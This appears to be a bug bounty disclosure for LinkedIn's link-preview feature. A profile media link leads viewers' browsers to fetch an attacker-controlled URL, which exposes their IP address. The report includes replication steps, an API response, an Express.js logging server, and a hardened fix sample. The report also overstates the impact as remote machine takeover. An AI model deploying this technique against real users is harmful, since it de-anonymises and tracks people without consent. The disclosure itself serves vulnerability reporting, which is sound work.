Summary

The vulnerability leads to IP address disclosure, which can be used to perform harmful actions such as taking over the user's machine with the Metasploit framework.

Replication Steps

Step 1:
  • Replace {user-name} with your user name, then go to https://www.linkedin.com/in/{user-name}/edit/topcard/.

You will see something like this

Step 2:
  • Go to the media section, then add a link.

    Step 2

When com.linkedin.voyager.feed.urlpreview.PreviewImage fails to find any preview images, it uses our link itself as the preview image. To trigger this, the linked page must not contain any image URL in its meta tags.

  • LinkedIn URL preview endpoint:
    https://www.linkedin.com/voyager/api/feed/urlpreview/{URL}

For example:

When adding https://a738b3cb.ngrok.io/user, we got:

  • Response:

    {
      "data": {
        "$deletedFields": [],
        "value": {
          "com.linkedin.voyager.feed.urlpreview.PreviewCreationSuccessful": "0ZVEtnT7kRtbMZxlzyoLnQ==,root,value,com.linkedin.voyager.feed.urlpreview.PreviewCreationSuccessful"
        },
        "$type": "com.linkedin.voyager.feed.urlpreview.UrlPreviewResponse",
        "$id": "0ZVEtnT7kRtbMZxlzyoLnQ==,root"
      },
      "included": [
        {
          "$deletedFields": [],
          "data": "0ZVEtnT7kRtbMZxlzyoLnQ==,root,value,com.linkedin.voyager.feed.urlpreview.PreviewCreationSuccessful,data",
          "$type": "com.linkedin.voyager.feed.urlpreview.PreviewCreationSuccessful",
          "$id": "0ZVEtnT7kRtbMZxlzyoLnQ==,root,value,com.linkedin.voyager.feed.urlpreview.PreviewCreationSuccessful"
        },
        {
          "urn": "urn:li:article:7726755832606755082",
          "previewImages": [],
          "$deletedFields": [
            "description",
            "update"
          ],
          "resolvedUrl": "https://a738b3cb.ngrok.io/user",
          "source": "a738b3cb.ngrok.io",
          "id": "urn:li:article:7726755832606755082",
          "type": "com.linkedin.voyager.feed.urlpreview.UrlPreviewResponse",
          "title": "The Rock",
          "url": "https://a738b3cb.ngrok.io/user",
          "$type": "com.linkedin.voyager.feed.urlpreview.UrlPreviewData",
          "$id": "0ZVEtnT7kRtbMZxlzyoLnQ==,root,value,com.linkedin.voyager.feed.urlpreview.PreviewCreationSuccessful,data"
        }
      ]
    }
  • If the previewImages key in the response is an empty array, com.linkedin.voyager.feed.urlpreview.PreviewImage uses resolvedUrl as the preview image.

    preview-image

  • When a user visits the profile and clicks See more, the preview image is loaded directly in the background by the viewer's browser.

    loaded in background

  • I added a new header called User-Message to the request headers.

    adding new header-tag

  • The header and its contents show up in the logs.

    We got the message

We've got the flag
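As an added example (not code from this report or from LinkedIn), here is the preview-image fallback described above, reconstructed as a hypothetical function, beside a hardened version that only ever returns a URL on our own origin; the proxy host and the /media-proxy path are assumptions.

```javascript
// Constructed sample: the UrlPreviewData object from the response above,
// with previewImages empty because the linked page has no og:image tag.
const previewNoImage = {
  urn: "urn:li:article:7726755832606755082",
  previewImages: [],
  resolvedUrl: "https://a738b3cb.ngrok.io/user",
  source: "a738b3cb.ngrok.io",
  title: "The Rock",
};

// Constructed sample: the same preview when the page does declare an og:image.
const previewWithImage = {
  ...previewNoImage,
  previewImages: ["https://a738b3cb.ngrok.io/poster.png"],
};

// Vulnerable selection (hypothetical reconstruction of the behaviour the
// report describes): with no preview image, fall back to the link itself,
// so every profile viewer's browser fetches the third-party URL and leaks its IP.
function choosePreviewImageVulnerable(preview) {
  return preview.previewImages.length > 0
    ? preview.previewImages[0]
    : preview.resolvedUrl;
}

// Hardened selection: the only URL handed to the viewer is on our own origin.
// A real preview image is fetched server-side through an image proxy (assumed
// to live at /media-proxy on PROXY_ORIGIN); a missing image means no image at
// all, never a fallback to the linked page.
const PROXY_ORIGIN = "https://media.example.com"; // assumed proxy host
function choosePreviewImageHardened(preview) {
  const candidate = preview.previewImages[0];
  if (!candidate) return null;
  let parsed;
  try {
    parsed = new URL(candidate);
  } catch {
    return null;
  }
  if (parsed.protocol !== "https:") return null;
  // The proxy fetches candidate itself; the viewer only ever talks to us.
  return `${PROXY_ORIGIN}/media-proxy?url=${encodeURIComponent(parsed.href)}`;
}

// Invariant a reviewer can check: a preview URL never points off our origin.
function isSameOrigin(url) {
  return url === null || new URL(url).origin === PROXY_ORIGIN;
}
```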

Attack script/tool

It's an Express.js application written in Node.js.

  • Author: me
  • Written in: Node.js
  • Dependencies: {"express": "^4.15.3"}
  • Installation: npm install
  • Run: node start
  • We check the Accept and Referer headers to detect whether the request was sent from linkedin.com or not.

    app.get('/user', function (req, res) {
        // An image request coming from linkedin.com: serve the image and log the request
        if (/image\/(.*)/.test(req.header('accept')) && /linkedin.com/.test(req.header('referer'))) {
            res.sendFile(ourImage);
            storeLogs();
        } else {
            // Anything else gets the HTML page that carries no image meta tags
            res.sendFile(ourHTMLpage);
        }
        ...
  • If both Accept and Referer match, serve the image and store the request payload in log.json.

  • Otherwise, send an HTML page without any of the meta tags used for an image:

    <html prefix="og: http://ogp.me/ns#">
    <head>
        <title>The Rock (1996)</title>
        <meta property="og:title" content="The Rock" />
        <meta property="og:type" content="video.movie" />
        <meta property="og:url" content="http://www.imdb.com/title/tt0117500/" />
    </head>
    <body>
    </body>
    </html>

The full script is in the attachment.

Exploitability

Since the attacker's profile is publicly accessible, this vulnerability could affect all users on the given domain, because the attacker's profile is publicly visible to any other user on the platform. Furthermore, this could be used to perform actions against the victim (or any user visiting that page) and could potentially lead to taking over the user's machine remotely. This could happen by users navigating to the attacker's profile on their own, or by the attacker somehow persuading the victim to navigate to the profile.

Impact

Taking over a user's machine would allow an attacker to perform harmful actions. A great topic about how to target a public IP with Metasploit.

Proof of concept

Watch the video at https://youtu.be/DNywwox2Lv8 (don't worry, it's an unlisted video).